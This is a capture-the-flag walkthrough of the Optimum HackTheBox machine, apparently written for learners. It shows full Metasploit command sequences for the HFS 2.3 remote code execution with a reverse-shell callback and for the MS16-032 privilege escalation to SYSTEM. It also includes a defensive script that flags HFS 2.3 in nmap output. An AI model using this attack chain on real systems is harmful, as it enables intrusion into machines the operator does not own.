Optimum HackTheBox WalkThrough

This is a walkthrough of the Optimum HackTheBox machine. In this writeup, I demonstrate step by step how I rooted the Optimum HTB box. Before starting, here is some background on the machine: it is a Windows box with IP address 10.10.10.8, and its maker assigned it the difficulty easy.
This machine is currently retired, so you will need a VIP subscription at hackthebox.eu to access it. Before starting, connect your PC to the VPN and confirm your connectivity with the Optimum machine by pinging the IP 10.10.10.8. If you have a connectivity problem, make sure the Optimum machine is running in the lab. If all is correct, start hacking.
As usual, I started by scanning the machine. Scanning gives us an idea of how to proceed further: it helps in banner grabbing the services running on different ports, and sometimes it helps in vulnerability scanning as well. I used the nmap port scanner for this job. Nmap gave the following result:
Scanning
$ nmap -sC -sV -T3 -oN optimum_scan 10.10.10.8

Nmap revealed that only port 80 is open, and that HttpFileServer version 2.3 is running on it. As soon as I know a piece of software and its version, I immediately search for available exploits using Searchsploit.
Searching Exploit
$ searchsploit HFS 2.3

Searchsploit listed two Remote Code Execution exploits. Therefore, we have two different ways to execute code remotely on the Optimum machine and get a reverse shell. Further, searching for hfs in Metasploit gave the module exploit/windows/http/rejetto_hfs_exec for this RCE exploit. I used this module and could easily get a reverse shell.
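The same banner that nmap reported above is what a defender can inventory for. The following is an added example, not part of the original writeup: it parses `nmap -sV -oN` output and flags any host that still exposes HttpFileServer 2.3. The sample scan text, the hosts in 192.0.2.0/24 and the function names are constructed for illustration.

```python
import re

# Product/version pairs to flag. Only HFS 2.3 comes from the walkthrough;
# extend this table from your own advisories (assumption of this example).
FLAGGED = {
    ("HttpFileServer httpd", "2.3"): "public RCE exploits listed by searchsploit",
}

# One open-port row of `nmap -sV -oN` output: PORT STATE SERVICE [VERSION]
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)(?:\s+(.*\S))?\s*$")

# Constructed sample in the shape nmap writes; not captured from a real scan.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.8
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
Nmap scan report for files.example.internal (192.0.2.20)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh
8080/tcp open  http    HttpFileServer httpd 2.3
Nmap scan report for 192.0.2.30
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.4
443/tcp open  ssl/http Microsoft IIS httpd 8.5
"""

def parse_open_services(nmap_text):
    """Yield (host, port, banner) for every open port in -oN output."""
    host = None
    for line in nmap_text.splitlines():
        if line.startswith("Nmap scan report for "):
            # Last token is the address, in parentheses when a name precedes it.
            host = line.split()[-1].strip("()")
            continue
        m = PORT_RE.match(line)
        if m and host:
            yield host, int(m.group(1)), m.group(4) or ""

def flag_services(nmap_text):
    """Return (host, port, product version, reason) for each flagged banner."""
    findings = []
    for host, port, banner in parse_open_services(nmap_text):
        for (product, version), reason in FLAGGED.items():
            # Exact version token: "2.3" must not also match "2.30" or "2.3.1".
            pattern = rf"{re.escape(product)}\s+{re.escape(version)}(?![\w.])"
            if re.search(pattern, banner):
                findings.append((host, port, f"{product} {version}", reason))
    return findings
```

The match is deliberately exact on the version token, so lettered or later releases are not flagged unless you add them to the table.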

Getting User Shell
msf5 > search rejetto
msf5 > use exploit/windows/http/rejetto_hfs_exec
msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.10.8
msf5 exploit(windows/http/rejetto_hfs_exec) > set SRVHOST 10.10.14.5
msf5 exploit(windows/http/rejetto_hfs_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.14.5
msf5 exploit(windows/http/rejetto_hfs_exec) > exploit
meterpreter > sysinfo
Tip: Always use a payload that is compatible with the exploit. For example, if your exploit target is an x64 machine then you should prefer an x64 payload. Otherwise, you may get errors: your session may close as soon as it opens, or it may not open completely when the machine is exploited.

Got a meterpreter shell. I upgraded it to a full cmd shell so that we would have more options for executing Windows commands.
Upgrading Shell
meterpreter > shell

We are logged in as user kostas. Let us grab user flag.
Capture User Flag
$ type user.txt.txt

Privilege Escalation
To escalate privileges to the administrator user, I first had to find a Privilege Escalation Vector through which I could gain an admin shell. To find a PrivEsc vector I used Metasploit's post/multi/recon/local_exploit_suggester module (a post-exploitation module which searches for possible kernel exploits whose patches are not installed on the compromised machine). To use this module, I exited the shell with the exit command and then used the background command to background the session.
$ exit
meterpreter > background

Finding PrivEsc Vector
The post/multi/recon/local_exploit_suggester module listed two potential exploits that could be used to escalate privileges. After trying both of them, I could not escalate because both reported the target as not vulnerable.
msf5 exploit(windows/http/rejetto_hfs_exec) > search exploit_suggester
msf5 exploit(windows/http/rejetto_hfs_exec) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf5 post(multi/recon/local_exploit_suggester) > run

I then ran the post-exploitation enumeration script Sherlock.ps1, a PowerShell script that quickly finds missing software patches for local privilege escalation vulnerabilities. It found that MS16-032 could be used to escalate privileges. So here, our Privilege Escalation Vector is a Kernel Exploit.
You can clone Sherlock from its GitHub repository.
Running Sherlock.ps1 through Meterpreter
msf5 post(multi/recon/local_exploit_suggester) > sessions -i 1
meterpreter > load powershell
meterpreter > powershell_import /root/HackTheBox/Optimum/Sherlock/Sherlock.ps1
meterpreter > powershell_execute Find-AllVulns

Sherlock.ps1 listed three kernel exploits, namely MS16-032, MS16-034 and MS16-135, and among them only the MS16-032 exploit worked. Let us escalate privileges to administrator.
Getting Root Shell
meterpreter > background
msf5 exploit(windows/http/rejetto_hfs_exec) > search ms16-032
msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.14.5
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
meterpreter > getuid

We are NT AUTHORITY\SYSTEM, which is the highest privilege on a Windows system.
Capture Root Flag
$ type \Users\Administrator\Desktop\root.txt

This is how I rooted the Optimum HackTheBox machine. I learnt a lot from rooting this box. I hope you have also learnt some new things from it. Thanks for reading this writeup. Share your experience in the comment section. For any suggestion or query related to the walkthrough, feel free to write to us at [email protected].
The next walkthrough will be the Bastard Windows machine.
